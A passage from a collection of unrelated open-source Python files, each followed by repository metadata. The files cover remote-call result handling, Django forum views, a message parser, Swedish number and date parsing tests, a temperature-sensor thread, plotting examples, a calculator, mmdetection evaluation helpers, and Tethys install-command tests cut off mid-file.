self._iterator = True
self.set(RemoteIterator())
# exception
def set_remote_exception(self, remote_exc_info):
"""Raises an exception as a :exc:`RemoteException`."""
exc_type, exc_str, filename, lineno = remote_exc_info[:4]
exc_type = RemoteException.compose(exc_type)
exc = exc_type(exc_str, filename, lineno, self.worker_info)
if len(remote_exc_info) > 4:
state = remote_exc_info[4]
exc.__setstate__(state)
self.set_exception(exc)
def set_exception(self, exc):
if self.is_iterator():
self.get().throw(exc)
else:
super(RemoteResult, self).set_exception(exc)
# reply receivers
def set_reply(self, method, value):
if method == RETURN:
self._return(value)
elif method == YIELD:
self._yield(value)
elif method == RAISE:
self._raise(value)
elif method == BREAK:
self._break(value)
if method & DONE:
self.collector.remove_result(self)
def _return(self, value):
self.set(value)
def _yield(self, value):
if not self.is_iterator():
self.set_iterator()
self.get().send(value)
def _raise(self, value):
self.set_remote_exception(value)
def _break(self, value):
if self.is_iterator():
self.get().close()
else:
self.set(iter([]))
def __repr__(self):
return make_repr(self, None, ['call_id', 'task_id', 'worker_info'],
reprs={'call_id': hexlify, 'task_id': hexlify})
class RemoteException(BaseException):
_composed = {}
@classmethod
def compose(cls, exc_type):
try:
return cls._composed[exc_type]
except KeyError:
class composed_exc_type(exc_type, cls):
__init__ = cls.__init__
composed_exc_type.exc_type = exc_type
composed_exc_type.exctype = exc_type # For backward compatibility.
composed_exc_type.__name__ = exc_type.__name__ + '(Remote)'
# Avoid to start with dot in traceback.
composed_exc_type.__module__ = 'exceptions'
cls._composed[exc_type] = composed_exc_type
return composed_exc_type
def __init__(self, message, filename=None, lineno=None, worker_info=None):
super(RemoteException, self).__init__(message)
self.filename = filename
self.lineno = lineno
self.worker_info = worker_info
def __str__(self):
string = super(RemoteException, self).__str__()
if self.filename is not None:
string += ' ({0}:{1})'.format(self.filename, self.lineno)
return string
class RemoteIterator(object):
def __init__(self):
self.queue = Queue()
def __iter__(self):
return self
def send(self, value):
if self.queue is None:
raise StopIteration
self.queue.put((True, value))
def throw(self, exc):
if self.queue is None:
raise StopIteration
self.queue.put((False, exc))
def close(self):
self.throw(StopIteration)
def __next__(self):
if self.queue is None:
raise StopIteration
yields, value = self.queue.get()
if yields:
return value
else:
self.queue = None
raise value
next = __next__ # for Python 2
| 27.68 | 79 | 0.615607 | [
"BSD-3-Clause"
] | sublee/zeronimo | zeronimo/results.py | 4,844 | Python |
from forums.models import Forum, Comment
from django.views import View
from django.views import generic
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from forums.forms import CommentForm
from myarts.owner import OwnerListView, OwnerDetailView, OwnerCreateView, OwnerUpdateView, OwnerDeleteView
class ForumListView(OwnerListView):
model = Forum
template_name = "forums/list.html"
class ForumDetailView(OwnerDetailView):
model = Forum
template_name = "forums/detail.html"
def get(self, request, pk) :
x = get_object_or_404(Forum, id=pk)
comments = Comment.objects.filter(forum=x).order_by('-updated_at')
comment_form = CommentForm()
context = { 'forum' : x, 'comments': comments, 'comment_form': comment_form }
return render(request, self.template_name, context)
class ForumCreateView(OwnerCreateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumUpdateView(OwnerUpdateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumDeleteView(OwnerDeleteView):
model = Forum
template_name = "forums/delete.html"
class CommentCreateView(LoginRequiredMixin, View):
def post(self, request, pk) :
f = get_object_or_404(Forum, id=pk)
comment = Comment(text=request.POST['comment'], owner=request.user, forum=f)
comment.save()
return redirect(reverse('forums:forum_detail', args=[pk]))
class CommentDeleteView(OwnerDeleteView):
model = Comment
template_name = "forums/comment_delete.html"
# https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id
def get_success_url(self):
forum = self.object.forum
return reverse('forums:forum_detail', args=[forum.id])
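# A sketch of the URLconf these views imply (the paths and most names below
# are hypothetical; only the 'forums' namespace and the 'forum_detail' name
# are taken from the reverse() calls above):
#
#   app_name = 'forums'
#   urlpatterns = [
#       path('', ForumListView.as_view(), name='all'),
#       path('forum/<int:pk>', ForumDetailView.as_view(), name='forum_detail'),
#       path('forum/<int:pk>/comment', CommentCreateView.as_view(),
#            name='forum_comment_create'),
#   ]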
| 33.016949 | 106 | 0.724846 | [
"MIT"
] | wajihma/Django | forums/views.py | 1,948 | Python |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
"""Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
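    For example (illustrative only; the exact Python types of the parsed
    values are determined by GetValues):
        parseKeyValueData("az=1, 2; name='alt'; ready")
        would return an ordered dict like
        {'az': (1, 2), 'name': ('alt',), 'ready': ()}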
"""
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
# print "got keyword %r; nextInd = %r" % (keyword, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
# print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| 39.111111 | 92 | 0.636048 | [
"BSD-3-Clause"
] | sdss/opscore | python/opscore/RO/ParseMsg/ParseData.py | 3,168 | Python |
from django.template.backends import django
from django.shortcuts import render, redirect
def main_board(request):
return render(request, 'main_page.html')
def redirect_main(request):
return redirect('main_boar_url', permanent=True)
| 20.5 | 52 | 0.780488 | [
"MIT"
] | nikonura/ITMO_ICT_WebProgramming_2020 | students/k3342/laboratory_works/Nikonchuk_Anna/Lr1/minos/minos/views.py | 246 | Python |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime, time
from lingua_franca.parse import extract_datetime
from lingua_franca.parse import extract_number
from lingua_franca.parse import normalize
class TestNormalize(unittest.TestCase):
def test_extractnumber_sv(self):
self.assertEqual(extract_number("1 och en halv deciliter",
lang='sv-se'), 1.5)
self.assertEqual(extract_number("det här är det första testet",
lang='sv-se'), 1)
self.assertEqual(extract_number("det här är test nummer 2",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är det andra testet",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är tredje testet",
lang='sv-se'), 3)
self.assertEqual(extract_number("det här är test nummer 4",
lang='sv-se'), 4)
self.assertEqual(extract_number("en tredjedels dl",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("tre deciliter",
lang='sv-se'), 3)
self.assertEqual(extract_number("1/3 deciliter",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("1/4 dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("2/3 dl",
lang='sv-se'), 2.0 / 3.0)
self.assertEqual(extract_number("3/4 dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("1 och 3/4 dl",
lang='sv-se'), 1.75)
self.assertEqual(extract_number("tre fjärdedels dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("trekvarts kopp",
lang='sv-se'), 3.0 / 4.0)
def test_extractdatetime_sv(self):
def extractWithFormat(text):
date = datetime(2017, 6, 27, 0, 0)
[extractedDate, leftover] = extract_datetime(text, date,
lang='sv-se')
extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
return [extractedDate, leftover]
def testExtract(text, expected_date, expected_leftover):
res = extractWithFormat(text)
self.assertEqual(res[0], expected_date)
self.assertEqual(res[1], expected_leftover)
testExtract("Planera bakhållet 5 dagar från nu",
"2017-07-02 00:00:00", "planera bakhållet")
testExtract("Vad blir vädret i övermorgon?",
"2017-06-29 00:00:00", "vad blir vädret")
testExtract("Påminn mig klockan 10:45",
"2017-06-27 10:45:00", "påminn mig klockan")
testExtract("vad blir vädret på fredag morgon",
"2017-06-30 08:00:00", "vad blir vädret")
testExtract("vad blir morgondagens väder",
"2017-06-28 00:00:00", "vad blir väder")
testExtract("påminn mig att ringa mamma om 8 veckor och 2 dagar",
"2017-08-24 00:00:00", "påminn mig att ringa mamma om och")
testExtract("Spela Kurt Olssons musik 2 dagar från Fredag",
"2017-07-02 00:00:00", "spela kurt olssons musik")
testExtract("vi möts 20:00",
"2017-06-27 20:00:00", "vi möts")
def test_extractdatetime_default_sv(self):
default = time(9, 0, 0)
anchor = datetime(2017, 6, 27, 0, 0)
res = extract_datetime('påminn mig att klippa mig på fredag',
anchor, lang='sv-se', default_time=default)
self.assertEqual(default, res[0].time())
def test_numbers(self):
self.assertEqual(normalize("det här är ett ett två tre test",
lang='sv-se'),
"det här är 1 1 2 3 test")
self.assertEqual(normalize(" det är fyra fem sex test",
lang='sv-se'),
"det är 4 5 6 test")
self.assertEqual(normalize("det är sju åtta nio test",
lang='sv-se'),
"det är 7 8 9 test")
self.assertEqual(normalize("det är tio elva tolv test",
lang='sv-se'),
"det är 10 11 12 test")
self.assertEqual(normalize("det är arton nitton tjugo test",
lang='sv-se'),
"det är 18 19 20 test")
if __name__ == "__main__":
unittest.main()
| 48.168067 | 79 | 0.527041 | ["Apache-2.0"] | JarbasAl/lingua-franca | test/test_parse_sv.py | 5778 | Python
# -----------------------------------------------------
# File: temperature.py
# Author: Tanner L
# Date: 09/20/19
# Desc: Temperature sensor communication
# Inputs:
# Outputs: temperature
# -----------------------------------------------------
import threading as th
import logging
import time
import interface
import adafruit_dht # import library for temperature sensor
import board
# -----------------------------------------------------
# Function: class - temperatureThread
# Author: Tanner L
# Date: 10/10/19
# Desc:      Background thread that polls the DHT11 temperature sensor and publishes readings
# Inputs:
# Outputs:
# -----------------------------------------------------
class TemperatureThread(th.Thread):
def __init__(self):
th.Thread.__init__(self)
logging.info('--------------------TEMPERATURE START----------------------------')
self.go = True
# -----------------------------------------------------
# Function: run
# Author: Tanner L
# Date: 10/10/19
# Desc: Loop for temperatureThread, gets temperature from sensor
# Inputs:
# Outputs:
# -----------------------------------------------------
def run(self):
sensor = adafruit_dht.DHT11(board.D16) # setup dht11 to be read
while self.go:
try:
interface.temperature_queue = sensor.temperature # read in temperature
            except Exception:  # DHT11 reads fail intermittently; log and keep polling
logging.error('Temperature Sensor Error')
print('Temp Read Error')
            if interface.temperature_queue <= 0:
                time.sleep(1)  # no valid reading yet; retry every second
            else:
                time.sleep(10)  # valid reading; send a new temperature every 10 seconds
# -----------------------------------------------------
# Function: stop_thread
# Author: Tanner L
# Date: 10/10/19
# Desc: Stops thread for shutdown
# -----------------------------------------------------
def stop_thread(self): # used to kill thread
self.go = False
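# Usage sketch (added for illustration, not part of the original module): the
# rest of the byke interface is assumed to start and stop the thread roughly
# like this, reading interface.temperature_queue in between.
#
#   temp_thread = TemperatureThread()
#   temp_thread.start()        # begin polling the DHT11 in the background
#   ...                        # main loop consumes interface.temperature_queue
#   temp_thread.stop_thread()  # ask the polling loop to exit
#   temp_thread.join()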
| 29.681818 | 89 | 0.469117 | ["MIT"] | tdroque/byke_interface | byke_interface/temperature.py | 1959 | Python
from bokeh.layouts import gridplot
from bokeh.models import BooleanFilter, CDSView, ColumnDataSource
from bokeh.plotting import figure, show
source = ColumnDataSource(data=dict(x=[1, 2, 3, 4, 5], y=[1, 2, 3, 4, 5]))
booleans = [True if y_val > 2 else False for y_val in source.data['y']]
view = CDSView(filter=BooleanFilter(booleans))
tools = ["box_select", "hover", "reset"]
p = figure(height=300, width=300, tools=tools)
p.circle(x="x", y="y", size=10, hover_color="red", source=source)
p_filtered = figure(height=300, width=300, tools=tools,
x_range=p.x_range, y_range=p.y_range)
p_filtered.circle(x="x", y="y", size=10, hover_color="red", source=source, view=view)
show(gridplot([[p, p_filtered]]))
| 40.388889 | 85 | 0.698762 | ["BSD-3-Clause"] | harmbuisman/bokeh | sphinx/source/docs/user_guide/examples/data_filtering_boolean_filter.py | 727 | Python
# calculator example using while and if
giriş = """
(1) topla
(2) çıkar
(3) çarp
(4) böl
(5) karesini hesapla
(6) karekök hesapla
(7) cikis
"""
print(giriş)
while True:
soru = int(input("Yapmak istediğiniz işlemin numarasını girin : "))
if soru == 7:
print("çıkılıyor...")
break
elif soru == 1:
sayı1 = int(input("Toplama işlemi için ilk sayıyı girin : "))
sayı2 = int(input("Toplama işlemi için ikinci sayıyı girin : "))
print(sayı1, "+", sayı2, "=", sayı1 + sayı2)
elif soru == 2:
sayı3 = int(input("Çıkarma işlemi için ilk sayıyı girin : "))
sayı4 = int(input("Çıkarma işlemi için ikinci sayıyı girin : "))
print(sayı3, "-", sayı4, "=", sayı3 - sayı4)
elif soru == 3:
sayı5 = int(input("Çarpma işlemi için ilk sayıyı girin : "))
sayı6 = int(input("Çarpma işlemi için ikinci sayıyı girin : "))
print(sayı5, "x", sayı6, "=", sayı5 * sayı6)
elif soru == 4:
sayı7 = int(input("Bölme işlemi için ilk sayıyı girin : "))
sayı8 = int(input("Bölme işlemi için ikinci sayıyı girin : "))
print(sayı7, "/", sayı8, "=", sayı7 / sayı8)
elif soru == 5:
sayı9 = int(input("Karesini hesaplamak istediğiniz sayıyı girin : "))
print(sayı9, "sayısının karesi = ", sayı9 ** 2)
elif soru == 6:
sayı10 = int(input("Karekökünü hesaplamak istediğiniz sayıyı girin: "))
print(sayı10, "sayısının karekökü = ", sayı10 ** 0.5)
else:
print("Yanlış giriş.")
print("Aşağıdaki seçeneklerden birini giriniz :", giriş)
| 31.615385 | 80 | 0.574209 | ["MIT"] | omerkocadayi/WeWantEd---Pythona-Giris | 04-hesap-makinesi.py | 1754 | Python
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
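# Illustrative call pattern (not taken from the mmdetection sources); the
# distributed model wrapper and data_loader are assumed to be built elsewhere:
#
#   results = multi_gpu_test(model, data_loader, tmpdir='.eval_tmp',
#                            gpu_collect=True)
#   # `results` is populated only on rank 0; the other ranks receive None.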
def collect_results_cpu(result_part, size, tmpdir=None):
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN,),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
| 35.732984 | 79 | 0.603077 | ["Apache-2.0"] | lizhaoliu-Lec/Conformer | mmdetection/mmdet/apis/test.py | 6825 | Python
"""
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license
"""
from toxopy import fwarnings, trials
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def dlcboxplot(file,
variable,
ylab,
comparison,
jitter=False,
colors=False,
title=False,
save=False,
output_dir=None):
"""
file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
"""
df = pd.read_csv(file)
tls = trials()
new = ['FT', 'ALONE1', 'SALINE1', 'ALONE2', 'URINE1',
'ALONE3', 'SALINE2', 'ALONE4', 'URINE2', 'ALONE5']
if variable == 'distance':
df = df[(df['trial'].isin(tls[0::2]))]
d = {}
for i, j in zip(new, tls):
d[j] = i
df = df.replace(d)
df = df[df['var'] == variable]
sns.set(style='ticks', font_scale=1)
plt.figure(figsize=(13, 5), dpi=100)
if comparison == 'infection_status':
test, control = 'Infected', 'Control'
comparing = 'infection_status'
legend = 'Infection Status'
elif comparison == 'indoor_outdoor_status':
test, control = 'Indoor-outdoor', 'Indoor'
comparing = 'indoor_outdoor_status'
legend = 'Indoor-outdoor Status'
if colors is False:
my_pal = {control: '#00FFFF', test: '#E60E3C'}
else:
my_pal = {control: colors[0], test: colors[1]}
ax = sns.boxplot(x='trial',
y='value',
data=df,
hue=comparing,
palette=my_pal)
if jitter is True:
sns.stripplot(x='trial',
y='value',
data=df,
color='black',
size=3,
jitter=1)
if variable != 'distance':
for i in range(len(df['trial'].unique())-1):
if variable == 'vel':
plt.vlines(i+.5, 10, 45, linestyles='solid',
colors='black', alpha=0.2)
elif variable == 'cat_distance':
plt.vlines(i+.5, 0, 1.3, linestyles='solid',
colors='black', alpha=0.2)
if title is not False:
plt.title(title, fontsize=12)
else:
pass
ax.set_xlabel('Trial', fontsize=12)
ax.set_ylabel(ylab, fontsize=12)
ax.legend(title=legend)
plt.legend(title=legend)
'''add significance bars and asterisks between boxes.
[first pair, second pair], ..., [|, –], ...'''
if variable == 'vel':
l = [[7.75, 5.75], [8.25, 6.25], [26, 28], [31, 33]]
elif variable == 'cat_distance':
l = [[7.75, 5.75], [8.25, 6.25], [0.85, 0.9], [0.95, 1]]
for x1, x2, y1, y2 in zip(l[0], l[1], l[2], l[3]):
sig = plt.plot([x1, x1, x2, x2], [y1, y2, y2, y1],
linewidth=1,
color='k')
plt.text((x1 + x2) * .5, y2 + 0, "*",
ha='center', va='bottom', fontsize=18)
plt.show()
fig = ax.get_figure()
if save is True:
def sav(myString):
return fig.savefig(myString,
bbox_inches='tight',
dpi=100,
pad_inches=0.1)
if output_dir is not None:
sav(f'{output_dir}/{variable}.png')
else:
sav(f'{variable}.png')
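# Example call (a sketch: the CSV name follows the docstring above, while the
# y-label, colours and output directory are placeholders, not project defaults):
#
#   dlcboxplot('dlc_all_avgs_updated.csv', 'vel', 'Velocity',
#              'infection_status', jitter=True,
#              colors=['#0062FF', '#DB62FF'], save=True, output_dir='plots')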
| 29.484127 | 65 | 0.499058 | ["MIT"] | bchaselab/Toxopy | toxopy/dlcboxplot.py | 3718 | Python
import os
from django.test import TestCase
from django.core.exceptions import ValidationError
from unittest import mock
from conda.cli.python_api import Commands
from tethys_apps.cli import install_commands
FNULL = open(os.devnull, 'w')
class TestServiceInstallHelpers(TestCase):
@mock.patch('builtins.open', side_effect=IOError('test'))
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_open_file_error(self, mock_pretty_output, mock_exit, _):
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.open_file, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("test", po_call_args[0][0][0])
self.assertIn("An unexpected error occurred reading the file.", po_call_args[1][0][0])
mock_exit.assert_called_with(1)
def test_get_service_from_id_fail(self):
self.assertFalse(install_commands.get_service_from_id(9384))
def test_get_service_from_name_fail(self):
self.assertFalse(install_commands.get_service_from_name("sdfsdf"))
@mock.patch('tethys_services.models.PersistentStoreService.objects.get', return_value=True)
def test_get_service_from_id_persistent(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'persistent')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.SpatialDatasetService.objects.get', return_value=True)
def test_get_service_from_id_spatial(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'spatial')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.DatasetService.objects.get', return_value=True)
def test_get_service_from_id_dataset(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'dataset')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.WebProcessingService.objects.get', return_value=True)
def test_get_service_from_id_wps(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'wps')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.PersistentStoreService.objects.get', return_value=True)
def test_get_service_from_name_persistent(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'persistent')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.SpatialDatasetService.objects.get', return_value=True)
def test_get_service_from_name_spatial(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'spatial')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.DatasetService.objects.get', return_value=True)
def test_get_service_from_name_dataset(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'dataset')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.WebProcessingService.objects.get', return_value=True)
def test_get_service_from_name_wps(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'wps')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_apps.cli.install_commands.input')
def test_get_interactive_input(self, mock_input):
install_commands.get_interactive_input()
mock_input.assert_called_with("")
@mock.patch('tethys_apps.cli.install_commands.input')
def test_get_service_name_input(self, mock_input):
install_commands.get_service_name_input()
mock_input.assert_called_with("")
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_print_unconfigured_settings(self, mock_pretty_output):
class MockSetting:
def __init__(self, name, required):
self.name = name
self.required = required
app_name = 'foo'
mock_setting = [MockSetting('test_name', True)]
install_commands.print_unconfigured_settings(app_name, mock_setting)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'\nThe following settings were not configured for app: {app_name}:\n', po_call_args[0][0][0])
self.assertIn('test_name', po_call_args[2][0][0])
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.call')
def test_run_sync_stores(self, mock_call, mock_pretty_output):
from tethys_apps.models import PersistentStoreConnectionSetting
app_name = 'foo'
install_commands.run_sync_stores(app_name, [PersistentStoreConnectionSetting()])
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'Running syncstores for app {app_name}', po_call_args[0][0][0])
mock_call.assert_called_with(['tethys', 'syncstores', app_name], )
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', return_value={'service_type': 'service_type',
'linkParam': 'linkParam'})
@mock.patch('tethys_apps.cli.install_commands.link_service_to_app_setting')
def test_find_and_link(self, mock_link_service_to_app_setting, _):
service_type = 'service_type'
setting_name = 'setting_name'
service_name = 'service_name'
app_name = 'app_name'
install_commands.find_and_link(service_type, setting_name, service_name, app_name)
mock_link_service_to_app_setting.assert_called_with('service_type',
service_name,
app_name,
'linkParam',
setting_name)
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', return_value=False)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_find_and_link_warning(self, mock_pretty_output, _):
service_type = 'service_type'
setting_name = 'setting_name'
service_name = 'service_name'
app_name = 'app_name'
install_commands.find_and_link(service_type, setting_name, service_name, app_name)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'Warning: Could not find service of type: {service_type} with the name/id: {service_name}',
po_call_args[0][0][0])
class TestInstallServicesCommands(TestCase):
@mock.patch('tethys_apps.cli.install_commands.find_and_link')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.models.CustomSetting')
def test_configure_services(self, mock_customsettings, mock_pretty_output, mock_find_and_link):
app_name = 'foo'
custom_service_name = 'custom_service_name'
custom_setting_name = 'custom_setting_name'
persistent_service_name = 'persistent_service_name'
persistent_setting_name = 'persistent_setting_name'
services = {'version': 1, 'custom_setting': {custom_setting_name: custom_service_name},
'persistent': {persistent_setting_name: persistent_service_name}}
